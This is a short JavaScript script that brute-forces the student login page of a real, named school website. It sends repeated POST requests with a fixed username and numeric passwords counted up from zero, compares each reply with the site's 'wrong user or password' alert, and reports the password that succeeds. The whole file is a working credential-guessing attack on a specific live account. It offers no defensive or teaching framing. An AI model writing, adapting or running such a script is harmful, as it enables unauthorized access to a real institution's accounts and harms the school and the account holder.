var limitloop = 9999999999999;
var inputfront = "40628";
var debugmode = true;

function SelfLoop(loopunit, returnfunc) {

fetch("https://www.satitpatumwan.ac.th/m1/loginm1/Clog.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "referrer": "https://www.satitpatumwan.ac.th/m1/loginm1/login.php",
  "body": `Username=${inputfront}&Password=${loopunit}&logi=log+on`,
  "method": "POST",
}).then((returnres) => {
    return returnres.text();
}).then((textreturn) => {
    if (textreturn === `\n<script>alert(" user หรือ  password ไม่ถูกต้อง");window.history.back()</script>`) {
        if (debugmode) {
                console.log(`error check with number: ${loopunit}`);
            };
            if ((limitloop) > loopunit) {
                SelfLoop(loopunit + 1, returnfunc);
            } else {
                returnfunc("reach loop limit");
            };
        } else {
            returnfunc(loopunit);
    };
});


if (debugmode) {
    console.log(`start loop check`);
};
var returnselfloop = SelfLoop(0, (returnoutput) => {
    console.log("end loop check");
    console.log(`finish with ${returnoutput}`);
});